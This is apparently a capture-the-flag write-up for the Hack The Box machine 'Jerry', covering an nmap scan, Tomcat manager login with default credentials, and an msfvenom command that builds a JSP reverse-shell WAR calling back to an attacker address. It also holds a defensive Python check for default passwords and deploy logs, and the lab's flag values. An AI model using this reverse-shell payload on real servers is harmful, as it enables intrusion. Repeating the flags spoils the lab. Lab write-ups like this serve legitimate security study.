htb jerry

Information Gathering

# Nmap 7.98 scan initiated Sat Dec 27 06:19:34 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.12s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2008|7 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (97%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.008 days (since Sat Dec 27 06:09:14 2025)
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 27 06:20:16 2025 -- 1 IP address (1 host up) scanned in 41.97 seconds

The Tomcat application manager accepts the default credentials tomcat:s3cret.

Once logged in, uploading a WAR file through the manager is enough to get a shell.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.3 LPORT=4444 -f war -o shell.war
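The two weaknesses chained above (a manager account with a documented default password, and a WAR deployed through the manager) are both easy to audit for. The following is an added defensive check, not code from the original writeup: it parses a constructed tomcat-users.xml and constructed Tomcat access-log lines, flagging privileged accounts that use a known default password and successful manager deploy/upload requests. The password list and log format are assumptions (Tomcat's "common" access-log pattern).

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample tomcat-users.xml mirroring the account used on this box.
TOMCAT_USERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users>
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,admin-gui"/>
  <user username="ops" password="Wq9!x2Lm#" roles="manager-status"/>
</tomcat-users>
"""

# Assumed list of passwords that appear in Tomcat docs and examples.
KNOWN_DEFAULT_PASSWORDS = {"s3cret", "tomcat", "admin", "password"}
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui", "admin-script"}

def weak_manager_accounts(xml_text):
    """Return (username, roles) for accounts holding a manager/admin role
    with a known default password. Tag matching ignores the XML namespace
    that real tomcat-users.xml files declare."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if el.tag.split("}")[-1] != "user":
            continue
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        if roles & PRIVILEGED_ROLES and el.get("password") in KNOWN_DEFAULT_PASSWORDS:
            findings.append((el.get("username"), sorted(roles)))
    return findings

# Constructed access-log lines; the upload request is what a WAR deploy looks like.
ACCESS_LOG = """10.10.16.3 - tomcat [27/Dec/2025:06:22:01 +0000] "GET /manager/html HTTP/1.1" 200 19420
10.10.16.3 - tomcat [27/Dec/2025:06:22:40 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 19820
10.10.16.3 - - [27/Dec/2025:06:22:45 +0000] "GET /shell/ HTTP/1.1" 200 0
10.10.14.5 - - [27/Dec/2025:06:23:10 +0000] "GET /index.jsp HTTP/1.1" 200 11000
"""

LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
DEPLOY_RE = re.compile(r"^/manager/(html/upload|text/deploy|deploy)(\?|$)")

def war_deploy_events(log_text):
    """Return (client_ip, user, method, path) for successful manager deploy/upload requests."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, user, method, path, status = m.groups()
        if DEPLOY_RE.match(path) and status.startswith("2") and method in ("POST", "PUT"):
            events.append((ip, user, method, path.split("?")[0]))
    return events
```

Any hit from the first function means the manager interface is reachable with published credentials; any hit from the second outside a change window is a deployment worth checking against the webapps directory.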

C:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,418,716,672 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e
